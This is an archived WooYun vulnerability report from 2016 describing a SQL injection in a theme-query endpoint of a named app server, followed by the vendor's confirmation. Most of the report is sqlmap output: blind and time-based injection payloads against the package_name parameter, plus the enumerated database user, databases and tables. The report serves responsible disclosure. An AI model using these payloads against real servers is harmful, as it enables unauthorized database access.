乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-29: 细节已通知厂商并且等待厂商处理中 2016-03-30: 厂商已经确认,细节仅向厂商公开 2016-04-09: 细节向核心白帽子及相关领域专家公开 2016-04-19: 细节向普通白帽子公开 2016-04-29: 细节向实习白帽子公开 2016-05-14: 细节向公众公开
rt
http://esaytouch.app.jj.cn:8080/data/zip/page/querylanguagethemes?package_name=com.shere.assistivetouch&sort=-1&begin=-1&version_code=40506&language=cn&channel=xiaomi
Parameter: package_name (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: package_name=com.shere.assistivetouch' AND 9422=9422 AND 'iYFY'='iYFY&version_code=40506&language=cn&channel=xiaomi Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind (SELECT) Payload: package_name=com.shere.assistivetouch' OR (SELECT * FROM (SELECT(SLEEP(5)))guFc) AND 'sUVQ'='sUVQ&version_code=40506&language=cn&channel=xiaomi---database management system users [1]:[*] 'shere1'@'%'web application technology: Nginxback-end DBMS: MySQL 5.0.12available databases [3]:[*] information_schema[*] shere8[*] testDatabase: shere8[21 tables]+----------------------+| user || version || advertisement || app_update || blacklist || channel || channel_theme || country || exchange_code || feedback || market_auditing || message || platform || theme || theme_control_center || theme_country || theme_evo || theme_platform || theme_sort || theme_zip2 || theme_zip3 |+----------------------++----------------------+---------+| Table | Entries |+----------------------+---------+| theme_country | 103422 || channel_theme | 3343 || theme_zip3 | 429 || theme | 251 || country | 247 || exchange_code | 138 || theme_zip2 | 134 || message | 95 || theme_platform | 81 || market_auditing | 60 || theme_evo | 26 || channel | 10 || theme_sort | 9 || feedback | 8 || theme_control_center | 7 || advertisement | 3 || platform | 3 || `version` | 1 |+----------------------+---------+
危害等级:中
漏洞Rank:10
确认时间:2016-03-30 08:51
已通知相关技术人员进行处理,非常感谢您提供的信息
暂无